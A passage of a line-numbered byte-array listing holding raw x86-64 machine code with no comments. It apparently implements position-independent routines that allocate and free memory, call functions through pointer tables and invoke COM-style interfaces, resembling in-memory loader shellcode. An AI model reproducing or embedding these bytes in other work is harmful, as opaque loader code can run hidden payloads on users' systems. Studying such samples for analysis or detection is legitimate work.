655 | 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x68, 0x48, | |
656 | 0x8b, 0x8d, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x68, 0x41, 0xb8, | |
657 | 0x00, 0x00, 0x00, 0x00, 0xba, 0x01, 0x00, 0x00, 0x00, 0xff, 0xd0, 0xeb, | |
658 | 0x26, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x28, 0x89, | |
659 | 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, | |
660 | 0x89, 0x45, 0x60, 0x48, 0x8b, 0x45, 0x60, 0xff, 0xd0, 0xeb, 0x04, 0x90, | |
661 | 0xeb, 0x01, 0x90, 0x48, 0x83, 0xbd, 0x08, 0x01, 0x00, 0x00, 0x00, 0x74, | |
662 | 0x25, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x50, | |
663 | 0x48, 0x8b, 0x8d, 0x08, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x00, 0xc0, 0x00, | |
664 | 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0xeb, 0x04, 0x90, 0xeb, | |
665 | 0x01, 0x90, 0x48, 0x81, 0xc4, 0xd0, 0x01, 0x00, 0x00, 0x5d, 0xc3, 0x55, | |
666 | 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x70, 0x48, 0x89, 0x4d, 0x10, 0x48, | |
667 | 0x8b, 0x45, 0x10, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, | |
668 | 0x75, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x05, 0x48, 0x07, 0x00, 0x00, | |
669 | 0x48, 0x89, 0x45, 0xf8, 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, | |
670 | 0x80, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, | |
671 | 0x10, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8b, 0x92, | |
672 | 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x01, 0x48, 0x01, 0xd2, 0x41, | |
673 | 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00, 0xb9, | |
674 | 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x83, | |
675 | 0x7d, 0xf0, 0x00, 0x0f, 0x84, 0x9b, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, | |
676 | 0x10, 0x48, 0x8b, 0x40, 0x70, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8b, 0x92, | |
677 | 0x10, 0x19, 0x00, 0x00, 0x01, 0xd2, 0x41, 0x89, 0xd0, 0x48, 0x8b, 0x55, | |
678 | 0xf8, 0x48, 0x8d, 0x8a, 0x18, 0x19, 0x00, 0x00, 0x44, 0x89, 0x44, 0x24, | |
679 | 0x28, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9, | |
680 | 0xff, 0xff, 0xff, 0xff, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, 0x00, | |
681 | 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10, 0x48, | |
682 | 0x8b, 0x80, 0x20, 0x01, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, | |
683 | 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, | |
684 | 0x00, 0x0f, 0x85, 0xf1, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, | |
685 | 0x8b, 0x80, 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, | |
686 | 0x82, 0xec, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8d, 0x8a, | |
687 | 0xdc, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xe0, 0x48, 0x89, 0x54, 0x24, | |
688 | 0x20, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xba, 0x00, | |
689 | 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, | |
690 | 0x0f, 0x85, 0x9d, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x8b, | |
691 | 0x00, 0x48, 0x8b, 0x80, 0x08, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xe0, | |
692 | 0x4c, 0x8d, 0x45, 0xd6, 0x48, 0x8b, 0x55, 0xf0, 0xff, 0xd0, 0x89, 0x45, | |
693 | 0xec, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x64, 0x0f, 0xb7, 0x45, 0xd6, 0x66, | |
694 | 0x85, 0xc0, 0x74, 0x5b, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x8b, 0x00, 0x48, | |
695 | 0x8b, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, 0xfc, 0x04, 0x00, | |
696 | 0x00, 0x48, 0x8b, 0x4d, 0xe0, 0x4c, 0x8d, 0x45, 0xd8, 0xff, 0xd0, 0x89, | |
697 | 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x33, 0x48, 0x8b, 0x45, 0xe0, | |
698 | 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8b, | |
699 | 0x55, 0xd8, 0x48, 0x8b, 0x4d, 0xe0, 0x4c, 0x8d, 0x45, 0xc8, 0xff, 0xd0, | |
700 | 0x89, 0x45, 0xec, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8b, 0x00, 0x48, 0x8b, | |
701 | 0x40, 0x10, 0x48, 0x8b, 0x55, 0xd8, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, | |
702 | 0x8b, 0x45, 0xe0, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, | |
703 | 0x55, 0xe0, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10, 0x48, | |
704 | 0x8b, 0x80, 0x30, 0x01, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10, | |
705 | 0x48, 0x8b, 0x80, 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x01, 0x48, | |
706 | 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0xf0, 0x49, 0x89, 0xd0, 0xba, 0x00, | |
707 | 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x69, 0x18, 0x00, 0x00, 0x48, | |
708 | 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x4d, 0xf0, 0x41, | |
709 | 0xb8, 0x00, 0xc0, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, | |
710 | 0x90, 0x48, 0x83, 0xc4, 0x70, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x30, | |
711 | 0x02, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, | |
712 | 0x89, 0x8d, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, | |
713 | 0x00, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x75, 0x16, | |
714 | 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x05, 0x48, 0x07, 0x00, | |
715 | 0x00, 0x48, 0x89, 0x85, 0xa8, 0x01, 0x00, 0x00, 0xeb, 0x15, 0x48, 0x8b, | |
716 | 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x48, 0x07, 0x00, 0x00, | |
717 | 0x48, 0x89, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, | |
718 | 0x00, 0x00, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x95, 0xc0, 0x01, 0x00, | |
719 | 0x00, 0x48, 0x8b, 0x92, 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x01, | |
720 | 0x48, 0x01, 0xd2, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, | |
721 | 0x30, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, | |
722 | 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x83, 0xbd, 0xa0, 0x01, 0x00, 0x00, | |
723 | 0x00, 0x0f, 0x84, 0x78, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, | |
724 | 0x00, 0x00, 0x48, 0x8b, 0x40, 0x70, 0x48, 0x8b, 0x95, 0xa8, 0x01, 0x00, | |
725 | 0x00, 0x48, 0x8b, 0x92, 0x10, 0x19, 0x00, 0x00, 0x01, 0xd2, 0x41, 0x89, | |
726 | 0xd0, 0x48, 0x8b, 0x95, 0xa8, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x8a, 0x18, | |
727 | 0x19, 0x00, 0x00, 0x44, 0x89, 0x44, 0x24, 0x28, 0x48, 0x8b, 0x95, 0xa0, | |
728 | 0x01, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9, 0xff, 0xff, | |
729 | 0xff, 0xff, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x00, | |
730 | 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8d, 0x85, 0xc0, 0x00, 0x00, 0x00, | |
731 | 0x48, 0x89, 0x85, 0x20, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x20, 0x01, | |
732 | 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xc0, 0x01, 0x00, 0x00, | |
733 | 0xe8, 0x0c, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0x85, | |
734 | 0x38, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x20, 0x01, 0x00, 0x00, 0x48, | |
735 | 0x83, 0xc0, 0x18, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xc0, 0x01, 0x00, | |
736 | 0x00, 0xe8, 0xc8, 0x06, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x30, 0x01, 0x00, | |
737 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, | |
738 | 0x48, 0x8b, 0x80, 0x20, 0x01, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, | |
739 | 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, | |
740 | 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x59, 0x02, | |
741 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, | |
742 | 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xc0, 0x01, 0x00, 0x00, 0x4c, | |
743 | 0x8d, 0x82, 0x9c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xc0, 0x01, 0x00, | |
744 | 0x00, 0x48, 0x8d, 0x8a, 0x7c, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x80, | |
745 | 0x01, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x20, 0x4d, 0x89, 0xc1, 0x41, | |
746 | 0xb8, 0x03, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, | |
747 | 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00, | |
748 | 0x00, 0x0f, 0x85, 0x00, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, | |
749 | 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x95, 0xc0, | |
750 | 0x01, 0x00, 0x00, 0x48, 0x81, 0xc2, 0xcc, 0x04, 0x00, 0x00, 0x48, 0x8b, | |
751 | 0x8d, 0x80, 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x88, 0x01, 0x00, 0x00, | |
752 | 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01, | |
753 | 0x00, 0x00, 0x00, 0x0f, 0x85, 0x8e, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, | |
754 | 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, | |
755 | 0x8b, 0x95, 0x88, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x89, | |
756 | 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00, 0x00, | |
757 | 0x0f, 0x85, 0x47, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, | |
758 | 0x00, 0x48, 0x89, 0x85, 0x50, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, | |
759 | 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, | |
760 | 0x8d, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x20, 0x01, 0x00, 0x00, | |
761 | 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01, | |
762 | 0x00, 0x00, 0x00, 0x0f, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, | |
763 | 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48, | |
764 | 0x8b, 0x95, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x81, 0xc2, 0xcc, 0x03, 0x00, | |
765 | 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x90, 0x01, 0x00, | |
766 | 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, | |
767 | 0x8b, 0x40, 0x40, 0x48, 0x8b, 0x8d, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, | |
768 | 0x95, 0x90, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x02, 0x00, 0x00, 0x00, 0xff, | |
769 | 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, | |
770 | 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, | |
771 | 0x90, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x83, 0xbd, 0x9c, | |
772 | 0x01, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x8f, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
773 | 0x85, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x28, | |
774 | 0x48, 0x8b, 0x8d, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xa0, 0x01, | |
775 | 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x48, 0x00, 0x00, 0x00, 0x00, 0x48, | |
776 | 0xc7, 0x44, 0x24, 0x40, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x38, | |
777 | 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, | |
778 | 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, | |
779 | 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, | |
780 | 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, | |
781 | 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00, 0x00, 0x75, 0x22, 0x48, | |
782 | 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, | |
783 | 0x28, 0x48, 0x8b, 0x8d, 0x80, 0x01, 0x00, 0x00, 0xba, 0x02, 0x00, 0x00, | |
784 | 0x00, 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, | |
785 | 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, | |
786 | 0x8b, 0x95, 0x88, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, | |
787 | 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, | |
788 | 0x38, 0x48, 0x8b, 0x95, 0x80, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, | |
789 | 0xd0, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, | |
790 | 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x95, 0x80, 0x01, 0x00, 0x00, 0x48, 0x89, | |
791 | 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, | |
792 | 0x80, 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x01, 0x48, 0x8d, 0x14, | |
793 | 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x49, 0x89, 0xd0, 0xba, | |
794 | 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x54, 0x14, 0x00, 0x00, | |
795 | 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x50, 0x48, | |
796 | 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, | |
797 | 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x90, 0x48, 0x81, 0xc4, 0x30, | |
798 | 0x02, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, | |
799 | 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, | |
800 | 0x18, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, | |
801 | 0x48, 0x8d, 0x15, 0xd5, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x8b, | |
802 | 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x69, 0x01, 0x00, 0x00, | |
803 | 0x48, 0x89, 0x50, 0x08, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, | |
804 | 0x8d, 0x15, 0x91, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x10, 0x48, 0x8b, | |
805 | 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xf3, 0x02, 0x00, 0x00, | |
806 | 0x48, 0x89, 0x50, 0x18, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, | |
807 | 0x8d, 0x15, 0xae, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x20, 0x48, 0x8b, | |
808 | 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x08, 0x03, 0x00, 0x00, | |
809 | 0x48, 0x89, 0x50, 0x28, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, | |
810 | 0x8d, 0x15, 0x09, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x30, 0x48, 0x8b, | |
811 | 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x0e, 0x03, 0x00, 0x00, | |
812 | 0x48, 0x89, 0x50, 0x38, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, | |
813 | 0x8d, 0x15, 0x14, 0x02, 0x00, 0x00, 0x48, 0x89, 0x50, 0x40, 0x48, 0x8b, | |
814 | 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xfc, 0x02, 0x00, 0x00, | |
815 | 0x48, 0x89, 0x50, 0x48, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, | |
816 | 0x8d, 0x15, 0xf9, 0x02, 0x00, 0x00, 0x48, 0x89, 0x50, 0x50, 0x48, 0x8b, | |
817 | 0x45, 0xf8, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, | |
818 | 0xf8, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x50, 0x50, 0x90, 0x48, 0x83, | |
819 | 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, | |
820 | 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, | |
821 | 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x83, 0x7d, 0x20, | |
822 | 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x75, 0x48, 0x8b, | |
823 | 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8d, 0x88, 0xfc, 0x03, 0x00, | |
824 | 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, | |
825 | 0x89, 0xc2, 0xe8, 0x85, 0x13, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x25, 0x48, | |
826 | 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8d, 0x88, 0xac, 0x04, | |
827 | 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, | |
828 | 0x48, 0x89, 0xc2, 0xe8, 0x60, 0x13, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x1b, | |
829 | 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x10, 0x48, | |
830 | 0x8b, 0x4d, 0x10, 0xe8, 0x1d, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, | |
831 | 0x00, 0xeb, 0x10, 0x48, 0x8b, 0x45, 0x20, 0x48, 0xc7, 0x00, 0x00, 0x00, | |
832 | 0x00, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0x48, 0x83, 0xc4, 0x30, 0x5d, | |
833 | 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, | |
834 | 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, | |
835 | 0xf8, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45, | |
836 | 0xf0, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x0f, 0xc1, 0x10, 0x48, 0x8b, | |
837 | 0x45, 0xf8, 0x8b, 0x40, 0x08, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, | |
838 | 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48, | |
839 | 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, | |
840 | 0x83, 0xc0, 0x08, 0x48, 0x89, 0x45, 0xe8, 0x48, 0x8b, 0x55, 0xe8, 0xb8, | |
841 | 0x01, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x89, 0xc1, 0x89, 0xc8, 0xf0, 0x0f, | |
842 | 0xc1, 0x02, 0x01, 0xc8, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0x48, 0x83, | |
843 | 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, | |
844 | 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, | |
845 | 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, | |
846 | 0x8b, 0x45, 0x20, 0x83, 0xe0, 0x02, 0x85, 0xc0, 0x74, 0x39, 0x48, 0x83, | |
847 | 0x7d, 0x30, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x70, | |
848 | 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x00, 0x48, | |
849 | 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8b, 0x52, 0x28, 0x48, | |
850 | 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x50, 0x28, | |
851 | 0x48, 0x8b, 0x45, 0x30, 0x48, 0x89, 0x10, 0x8b, 0x45, 0x20, 0x83, 0xe0, | |
852 | 0x01, 0x85, 0xc0, 0x74, 0x36, 0x48, 0x83, 0x7d, 0x28, 0x00, 0x75, 0x07, | |
853 | 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x2d, 0x48, 0x8b, 0x45, 0xf8, 0x48, | |
854 | 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x55, 0xf8, 0x48, | |
855 | 0x83, 0xc2, 0x18, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0xf8, | |
856 | 0x48, 0x8d, 0x50, 0x18, 0x48, 0x8b, 0x45, 0x28, 0x48, 0x89, 0x10, 0xb8, | |
857 | 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x30, 0x5d, 0xc3, 0x55, 0x48, | |
858 | 0x89, 0xe5, 0x48, 0x83, 0xc4, 0x80, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, | |
859 | 0x55, 0x18, 0xc7, 0x45, 0xac, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa8, | |
860 | 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa4, 0x00, 0x00, 0x00, 0x00, 0x48, | |
861 | 0x8d, 0x45, 0xb0, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, | |
862 | 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x26, 0x11, 0x00, 0x00, 0x48, 0x8b, | |
863 | 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8d, 0x55, | |
864 | 0xb0, 0x48, 0x8b, 0x4d, 0x18, 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x83, 0x7d, | |
865 | 0xfc, 0x00, 0x75, 0x20, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, | |
866 | 0x8b, 0x40, 0x20, 0x4c, 0x8d, 0x4d, 0xa4, 0x4c, 0x8d, 0x45, 0xa8, 0x48, | |
867 | 0x8d, 0x55, 0xac, 0x48, 0x8b, 0x4d, 0x18, 0xff, 0xd0, 0x89, 0x45, 0xfc, | |
868 | 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xec, 0x80, 0x5d, 0xc3, 0x55, | |
869 | 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, 0x48, 0x89, 0x4d, 0x10, 0x48, | |
870 | 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, | |
871 | 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x40, 0x78, 0xff, | |
